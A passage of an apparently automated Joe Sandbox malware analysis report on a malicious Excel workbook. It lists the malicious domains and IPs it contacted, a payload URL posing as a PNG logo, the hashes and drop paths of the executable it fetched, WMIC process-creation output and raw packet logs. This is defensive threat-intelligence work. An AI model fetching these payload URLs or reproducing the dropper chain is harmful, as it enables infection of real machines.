                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://r3.i.lencr.org/0SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://templatelogging.office.com/client/log091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                                                  high
                                                                                                                  https://outlook.office365.com/091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                                                    high
                                                                                                                    https://webshell.suite.office.com091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                                                      high
                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive091AD497-E671-4FDF-8396-74EDF92EBBCF.0.drfalse
                                                                                                                        high
                                                                                                                        https://injuryless.com/?id=124406_ECF4BBEA1588mSettingSyncHost, 00000005.00000002.1526534901.0000000000D68000.00000004.00000020.sdmptrue
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://x1.c.lencr.org/0SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://x1.i.lencr.org/0SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://injuryless.com/?id=124406_ECF4BBEA1588m2SettingSyncHost, 00000005.00000002.1526548221.0000000000D83000.00000004.00000020.sdmptrue
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown

                                                                                                                        Contacted IPs


                                                                                                                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
193.178.169.243 | injuryless.com | unknown | 48282 | VDSINA-ASRU | true
95.142.44.93 | pigeonious.com | Russian Federation | 210079 | EUROBYTEEurobyteLLCMoscowRussiaRU | false

                                                                                                                        General Information

                                                                                                                        Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                        Analysis ID:432839
                                                                                                                        Start date:10.06.2021
                                                                                                                        Start time:20:29:54
                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                        Overall analysis duration:0h 10m 55s
                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                        Report type:full
                                                                                                                        Sample file name:Current-Status-062021-81197.xlsb
                                                                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                        Number of analysed new started processes analysed:22
                                                                                                                        Number of new started drivers analysed:0
                                                                                                                        Number of existing processes analysed:0
                                                                                                                        Number of existing drivers analysed:0
                                                                                                                        Number of injected processes analysed:0
                                                                                                                        Technologies:
                                                                                                                        • HCA enabled
                                                                                                                        • EGA enabled
                                                                                                                        • HDC enabled
                                                                                                                        • AMSI enabled
                                                                                                                        Analysis Mode:default
                                                                                                                        Analysis stop reason:Timeout
                                                                                                                        Detection:MAL
                                                                                                                        Classification:mal100.expl.evad.winXLSB@5/8@2/2
                                                                                                                        EGA Information:
                                                                                                                        • Successful, ratio: 100%
                                                                                                                        HDC Information:
                                                                                                                        • Successful, ratio: 35.3% (good quality ratio 32.5%)
                                                                                                                        • Quality average: 82.1%
                                                                                                                        • Quality standard deviation: 30.9%
                                                                                                                        HCA Information:Failed
                                                                                                                        Cookbook Comments:
                                                                                                                        • Adjust boot time
                                                                                                                        • Enable AMSI
                                                                                                                        • Found application associated with file extension: .xlsb
                                                                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                        • Attach to Office via COM
                                                                                                                        • Scroll down
                                                                                                                        • Close Viewer
                                                                                                                        Warnings:
                                                                                                                        • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• Not all processes were analyzed, report is missing behavior information
                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                        Simulations

                                                                                                                        Behavior and APIs

Time | Type | Description
20:30:52 | API Interceptor | 1x Sleep call for process: WMIC.exe modified

                                                                                                                        Joe Sandbox View / Context

                                                                                                                        IPs

Match | Associated Sample Name / URL | Detection
193.178.169.243 | logo.png.exe | malicious
193.178.169.243 | 3F97s4aQjB.xlsx | malicious
193.178.169.243 | tmp_Client-Status-062021-952177.vbs | malicious
95.142.44.93 | 3F97s4aQjB.xlsx | malicious

                                                                                                                                Domains

Match | Associated Sample Name / URL | Detection | Context
pigeonious.com | 3F97s4aQjB.xlsx | malicious | 95.142.44.93
injuryless.com | logo.png.exe | malicious | 193.178.169.243
injuryless.com | 3F97s4aQjB.xlsx | malicious | 193.178.169.243
injuryless.com | tmp_Client-Status-062021-952177.vbs | malicious | 193.178.169.243

                                                                                                                                ASN

                                                                                                                                scan_DHL39382493.exeGet hashmaliciousBrowse
                                                                                                                                • 185.105.109.34
                                                                                                                                3UiiwuZ4YR.exeGet hashmaliciousBrowse
                                                                                                                                • 95.142.44.135
                                                                                                                                5WIxZYV73V.exeGet hashmaliciousBrowse
                                                                                                                                • 185.105.109.19
                                                                                                                                0anROWjIhR.exeGet hashmaliciousBrowse
                                                                                                                                • 185.105.109.19
                                                                                                                                fast.exeGet hashmaliciousBrowse
                                                                                                                                • 185.105.109.19
                                                                                                                                kinsing2Get hashmaliciousBrowse
                                                                                                                                • 185.154.53.140
                                                                                                                                kinsingGet hashmaliciousBrowse
                                                                                                                                • 185.154.53.140

                                                                                                                                JA3 Fingerprints


                                                                                                                                Dropped Files

                                                                                                                                Match | Associated Sample Name / URL | Detection
                                                                                                                                C:\Users\Public\SettingSyncHost | 3F97s4aQjB.xlsx | malicious
                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\logo[1].png | 3F97s4aQjB.xlsx | malicious

                                                                                                                                    Created / dropped Files

                                                                                                                                    C:\Users\Public\SettingSyncHost
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):511488
                                                                                                                                    Entropy (8bit):7.3404073760047375
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12288:cyLjvFCsHOFO7t8BmzXiDm/znL2wOhlYuGUoPavYWIJdvrQoDptkYIN:BLDFTHOF0anwGYuGDQ2vQoDk5N
                                                                                                                                    MD5:526D56017EF5105277FE0D366C95C39D
                                                                                                                                    SHA1:78A40D523F4B887B2383681FECE447EF911C24EF
                                                                                                                                    SHA-256:28F2FA4F9AC95C3FC906E201B758D56C6A888B657DCF57C351A4F34FFB3E0FE2
                                                                                                                                    SHA-512:F2DC53598455B422B6B53108E94229B0F5791AC25188F0ED73FB4BFF1DF018B745F1F73714E97CF4E1C52475473326C1C91DC6070D331080F1FAAF696D58841E
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                    Joe Sandbox View:
                                                                                                                                    • Filename: 3F97s4aQjB.xlsx, Detection: malicious
                                                                                                                                    Reputation:low
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\091AD497-E671-4FDF-8396-74EDF92EBBCF
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):134922
                                                                                                                                    Entropy (8bit):5.369119258003808
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:4cQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:gEQ9DQW+ziXOe
                                                                                                                                    MD5:042D3F746892226A7BE71431B6635EBD
                                                                                                                                    SHA1:A171A408788DD9EE855D4C87E960E98CF4C43ED0
                                                                                                                                    SHA-256:F0FF8798D6B5E8D85FADFF08F7A9974F0843DF23BE340F28B886C9E84F0BB6FC
                                                                                                                                    SHA-512:9AAF01336D99A1754C9C1B5AB6AEA9402CC2FB9B821656FBF4FBDF8DD9912BB805526D6974AB4F650D293A2D33779B9C16BEAB621E404CE8EF2A29E7AD9F8E40
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\49018F97.png
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:PNG image data, 2186 x 1539, 8-bit/color RGB, non-interlaced
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):462772
                                                                                                                                    Entropy (8bit):7.968569347884841
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12288:yycQMfTEzs+VfqjROL5bgSj86X/5ARknBqrZsNAdee:yQMfYBVf1xBARkgaNyr
                                                                                                                                    MD5:5D1C907B7A28ED91D8A704A7CE928FAF
                                                                                                                                    SHA1:FA56635F0C2A6D93DABE3E0636DADEAECDFCE804
                                                                                                                                    SHA-256:AD72EF87E54764A13E87BBD446029F48D70114B120E6DA7025947B1D51554486
                                                                                                                                    SHA-512:52A22A801395A467AABC02B4C24236FCAC4197407FC0F5C4B0D9C79C8DFB9A5DD0D935C67A7730B7EBFCD80013967F392D48D6E697A09E684BCDC62F7DBB6376
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\logo[1].png
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):511488
                                                                                                                                    Entropy (8bit):7.3404073760047375
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12288:cyLjvFCsHOFO7t8BmzXiDm/znL2wOhlYuGUoPavYWIJdvrQoDptkYIN:BLDFTHOF0anwGYuGDQ2vQoDk5N
                                                                                                                                    MD5:526D56017EF5105277FE0D366C95C39D
                                                                                                                                    SHA1:78A40D523F4B887B2383681FECE447EF911C24EF
                                                                                                                                    SHA-256:28F2FA4F9AC95C3FC906E201B758D56C6A888B657DCF57C351A4F34FFB3E0FE2
                                                                                                                                    SHA-512:F2DC53598455B422B6B53108E94229B0F5791AC25188F0ED73FB4BFF1DF018B745F1F73714E97CF4E1C52475473326C1C91DC6070D331080F1FAAF696D58841E
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                    Joe Sandbox View:
                                                                                                                                    • Filename: 3F97s4aQjB.xlsx, Detection: malicious
                                                                                                                                    Reputation:low
                                                                                                                                    IE Cache URL:https://pigeonious.com/img/logo.png
                                                                                                                                    C:\Users\user\AppData\Local\Temp\A6B40000
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1041070
                                                                                                                                    Entropy (8bit):7.855884638864563
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12288:Qp4WH4vcCRa6p1RtTycQMfTEzs+VfqjROL5bgSj86X/5ARknBqrZsNAde5:O4vdRa6p1Rt/QMfYBVf1xBARkgaNys
                                                                                                                                    MD5:A6832F006ECA34E5E7495F7A3B5ADC6B
                                                                                                                                    SHA1:801FE0D57B16BFF66056840CD47BEED33B4ABB5C
                                                                                                                                    SHA-256:8DE78336A3BD486ABFE0B3DF88EFC9AD8BF2A64BF309C7107565F16BF838F757
                                                                                                                                    SHA-512:F7CC6E711DB08682BF125388C1395696A9073A236BB8196647DA27A4B53F450373D3BC52A1EAFCDB017108845450A469FFA14E1859DA419FE18135E3C7FD0EBF
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview: .T.n.0....?..........C....I?`M.%.|..$..w);n..V.....;3;...f.l...L.jf.B..6.k.....QQ......."......6"U...}...zt@M..9...A.....j......T.g....C,..q.O6W..^.)Y./.o.}.....5.2...^.!..je...C7.....1;..d.1=`.\..y.3....qEsY?....4.{....J..D.d.N0..i..y?....X.C.w..-...%..2.us.....B...5.T.....9..*<.4..RI...)...GhJASY.......DG.k.rx........B.[...O.T...c.!.~..@....7.....H.......:....>.H<..Nw...Kv...S6x..c.t`.i....2N5.#.r..........PK..........!..j0.............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................M
                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):22
                                                                                                                                    Entropy (8bit):2.9808259362290785
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                    MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                    SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                    SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                    SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                    Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                    C:\Users\user\Desktop\~$Current-Status-062021-81197.xlsb
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):165
                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                    MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                    SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                    SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                    SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                    Malicious:true
                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                    \Device\ConDrv
                                                                                                                                    Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):160
                                                                                                                                    Entropy (8bit):5.083203110114614
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1Mgjd330qJQAiveyzr:Yw7gJGWMXJXKSOdYiygKkXe/eg1deAin
                                                                                                                                    MD5:C62814DB19512E50685CCD10C45F4557
                                                                                                                                    SHA1:91CB5A204B91F9F81D791B07AACBE4CB2A79CC85
                                                                                                                                    SHA-256:FBDC5DD1D2DA5FEACF83F4FF1781A49DEDA141E18E33326B92B66D8D49C6725F
                                                                                                                                    SHA-512:7608BF46F85343150B8B4BD37FD994EEE0CE3D61BF5613A8D1DD3C93DD2B11E63190D419140DFE5A7AFED08E88C8B3C592E5241E4C048E6D670747A522B1D4FD
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 1808;...ReturnValue = 0;..};....

                                                                                                                                    Static File Info

                                                                                                                                    General

                                                                                                                                    File type:Zip archive data, at least v2.0 to extract
                                                                                                                                    Entropy (8bit):7.994144310692157
                                                                                                                                    TrID:
                                                                                                                                    • Excel Microsoft Office Binary workbook document (47504/1) 49.73%
                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 41.88%
                                                                                                                                    • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                                                    File name:Current-Status-062021-81197.xlsb
                                                                                                                                    File size:468533
                                                                                                                                    MD5:1ac719c744d22f42e4978e7b55828435
                                                                                                                                    SHA1:4ddc7358f615987bf92ed9192430693db65b097c
                                                                                                                                    SHA256:d9be275feff4b3383821b1483ba93424fb27aa40e138da41a91511193d9538cb
                                                                                                                                    SHA512:736bcf96ca99c893c535c555133a092400e1dbc5f5143500d152c537bccc9d3faf7d541b3b11be82b68bbf4c7a1528c5fa3b45394d5b2b958c4d1d4d024e7d22
                                                                                                                                    SSDEEP:12288:ag+iWCVTHlJFnI6TDEeTSH/NJDjXcXdeanuxZ2:4iVVTHxNcoSJDK1nuxA
                                                                                                                                    File Content Preview:PK...........R................docProps/PK..........!.,...............docProps/app.xml.S.N.0.....`.N...Zu.#T.XQ.....u&.EbG.......m.ZNp{3o........"-8....x.Q.F.\.ML......x.&..5...xz-...Kg.p... a|LK.f..W%....m.SXWK...0[.Z..U.5.d.Qt.`.`r./.^..)N[..hn.....vM...

                                                                                                                                    File Icon

                                                                                                                                    Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                    Static OLE Info

                                                                                                                                    General

                                                                                                                                    Document Type:OpenXML
                                                                                                                                    Number of OLE Files:1

                                                                                                                                    OLE File "Current-Status-062021-81197.xlsb"

                                                                                                                                    Indicators

                                                                                                                                    Has Summary Info:
                                                                                                                                    Application Name:
                                                                                                                                    Encrypted Document:
                                                                                                                                    Contains Word Document Stream:
                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                    Flash Objects Count:
                                                                                                                                    Contains VBA Macros:

                                                                                                                                    Macro 4.0 Code


                                                                                                                                    Network Behavior

                                                                                                                                    Network Port Distribution

                                                                                                                                    TCP Packets

                                                                                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                    Jun 10, 2021 20:30:51.067610025 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.067617893 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.067629099 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.067645073 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.067660093 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.067672968 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.067697048 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.067706108 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.067724943 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.067734957 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.145869017 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.145936966 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.145956993 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.145986080 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.145993948 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.146038055 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.146055937 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.146079063 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.146085978 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.146117926 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.146135092 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.146159887 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.146181107 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.146198988 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.146203995 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.146248102 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.146251917 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.146291971 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.146305084 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.146333933 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.146348953 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.146374941 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.146390915 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.146415949 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.146434069 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.146455050 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.146466970 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.146495104 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.146512032 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.146534920 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.146542072 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.146583080 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.146585941 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.146625996 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.146636963 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.146666050 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.146678925 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.146707058 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.146718979 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.146747112 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.146765947 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.146785975 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.146792889 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.146826029 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.146838903 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.146867990 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.146881104 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.146917105 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.146919966 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.146961927 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.146971941 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.147000074 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.147016048 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.147039890 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.147058964 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.147079945 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.147094965 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.147130966 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.147147894 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.147186041 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.147202015 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.147217035 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.147233009 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.147257090 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.147257090 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.147305965 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.147310019 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.147350073 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.147357941 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.147387981 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.147403002 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.147428989 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.147438049 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.147468090 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.147485018 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.147506952 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.147516966 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.147547007 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.147557020 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.147598028 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.225833893 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.225900888 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.225948095 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.225953102 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.225986004 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.225996971 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.226003885 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.226038933 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.226068974 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.226079941 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.226089001 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.226119995 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.226129055 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.226157904 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.226186991 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.226198912 CEST4434973495.142.44.93192.168.2.4
